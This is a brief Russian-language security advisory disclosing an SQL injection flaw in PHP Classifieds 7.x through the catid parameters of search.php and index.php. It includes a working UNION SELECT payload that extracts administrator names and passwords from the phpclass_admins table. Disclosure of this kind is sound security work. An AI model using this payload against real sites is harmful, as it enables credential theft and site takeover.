Программа: PHP Classifieds 7.x

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Из-за ошибки проверки вводимых пользовательских данных в параметре «catid_search» различными сценариями злоумышленник может произвести SQL-инъекцию.

Примеры:

search.php?catid_search=[sql]
index.php?catid=[sql]

Например, вывести имя пользователя и пароль в заголовок страницы:

index.php?catid=0 UNION SELECT concat(adm_name, space(1), adm_pass) AS adm_name, NULL FROM phpclass_admins



Оставить мнение